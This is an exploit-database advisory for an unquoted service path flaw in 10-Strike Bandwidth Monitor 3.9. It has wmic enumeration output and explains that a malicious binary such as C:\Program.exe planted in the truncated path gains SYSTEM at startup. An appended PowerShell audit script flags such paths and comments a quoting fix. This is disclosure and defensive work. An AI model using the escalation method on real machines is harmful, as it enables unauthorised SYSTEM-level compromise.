Bandwidth Monitor 3.9 – ‘Svc10StrikeBandMontitor’ Unquoted Service Path

  • Author: boku
    Date: 2020-06-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48591/
  • # Exploit Title: Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path
    # Exploit Author: Bobby Cooke
    # Date: 2020-07-15
    # Vendor Site: https://www.10-strike.com/
    # Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
    # Tested On: Windows 10 - Pro 1909 (x86)
    # Version: Version 3.9
    
    # Vulnerability Type: 
    # Local Privilege Escalation to LocalSystem by Unquoted Service Path.
    
    # Vulnerability Description:
    # The 10-Strike Bandwidth Monitor v3.9 services "Svc10StrikeBandMontitor", "Svc10StrikeBMWD", and "Svc10StrikeBMAgent" suffer 
    # from unquoted service path vulnerabilities that allow attackers to achieve Privilege Escalation to SYSTEM, at startup, 
    # by placing a malicious binary in the truncated service path, such as "C:\Program.exe".
    
    C:\Users\boku>wmic service get name,pathname,startmode,StartName | findstr "10-Strike Bandwidth Monitor"
    Svc10StrikeBandMonitor  C:\Program Files\10-Strike Bandwidth Monitor\BMsvc.exe          Auto  LocalSystem
    Svc10StrikeBMWD         C:\Program Files\10-Strike Bandwidth Monitor\BMWDsvc.exe        Auto  LocalSystem
    Svc10StrikeBMAgent      C:\Program Files\10-Strike Bandwidth Monitor Agent\BMAgent.exe  Auto  LocalSystem
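
The following audit script is an added example, not part of the original advisory or the vendor's software. It flags service paths that are unquoted and contain spaces, and lists the truncated locations whose write permissions an administrator should review; the function name `Get-UnquotedPathCandidates` is hypothetical, and the sample rows are copied from the wmic output above.

```powershell
# Added example: audit service PathName values for unquoted paths with spaces.
# Limitation: only image paths ending in ".exe" are analysed.
function Get-UnquotedPathCandidates {
    param([string]$PathName)

    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return }            # quoted: parsed unambiguously

    # Isolate the executable; anything after ".exe" is treated as arguments.
    $m = [regex]::Match($p, '^(.*?\.exe)(\s|$)', 'IgnoreCase')
    if (-not $m.Success) { return }
    $exe = $m.Groups[1].Value
    if ($exe -notmatch ' ') { return }            # no space: nothing to truncate

    # Each space is a point where Windows may stop and try "<prefix>.exe"
    # before it reaches the intended binary.
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

# Sample rows taken from the wmic output in the advisory.
$services = @(
    [pscustomobject]@{ Name = 'Svc10StrikeBandMonitor'
        PathName = 'C:\Program Files\10-Strike Bandwidth Monitor\BMsvc.exe' }
    [pscustomobject]@{ Name = 'Svc10StrikeBMWD'
        PathName = 'C:\Program Files\10-Strike Bandwidth Monitor\BMWDsvc.exe' }
    [pscustomobject]@{ Name = 'Svc10StrikeBMAgent'
        PathName = 'C:\Program Files\10-Strike Bandwidth Monitor Agent\BMAgent.exe' }
)
# On a live host, audit every installed service instead:
# $services = Get-CimInstance Win32_Service | Select-Object Name, PathName

foreach ($svc in $services) {
    $candidates = @(Get-UnquotedPathCandidates $svc.PathName)
    if ($candidates.Count -eq 0) { continue }
    [pscustomobject]@{
        Service        = $svc.Name
        PathName       = $svc.PathName
        # Review the ACLs of each parent folder; none should be writable
        # by non-administrators.
        CheckLocations = $candidates -join '; '
    }
    # Remediation (elevated prompt): wrap the executable portion of ImagePath
    # in double quotes, keeping any arguments outside the quotes, e.g.
    # Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" `
    #     -Name ImagePath -Value ('"{0}"' -f $svc.PathName)
}
```

The commented remediation line quotes the whole `PathName`, which is correct for the three services shown because none of them carries arguments.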